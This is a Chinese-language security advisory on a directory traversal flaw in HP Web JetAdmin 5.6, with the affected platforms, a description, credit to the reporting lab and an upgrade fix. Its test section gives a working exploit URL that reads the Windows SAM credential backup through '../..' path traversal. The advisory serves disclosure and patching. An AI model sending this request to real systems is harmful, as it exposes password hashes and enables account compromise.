发布日期：2000-05-25
更新日期：2000-05-26

受影响系统：

HP Web JetAdmin Version 5.6 (Microsoft Windows 2000)
HP Web JetAdmin Version 5.6 (Microsoft Windows NT 4.0)
HP Web JetAdmin Version 5.6 (HP-UX 10.20)    
HP Web JetAdmin Version 5.6 (HP-UX 11.x)     
HP Web JetAdmin Version 5.6 (Linux - SuSE)   
HP Web JetAdmin Version 5.6 (Novell NetWare)
HP Web JetAdmin Version 5.6 (Red Hat Linux)  
HP Web JetAdmin Version 5.6 (Solaris)

描述：

---

HP Web JetAdmin 5.6 Web 接口服务器缺省监听8000端口，当提交一个特殊格式的URL(包含
"../.."字符)时，一个远程用户将能读取web目录以外的文件的内容。

<* 来源： Underground Security Systems Research  (labs@ussrback.com)
          http://www.ussrback.com
*>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.victim.com:8000/cgi/wja?page=/../../../WINNT/repair/sam._          


建议：

---

更新到6.0版，下载地址：

here: http://www.hp.com/cposupport/swindexes/hpwebjetad1880_swen.html


浏览次数：9204
严重程度：0（网友投票）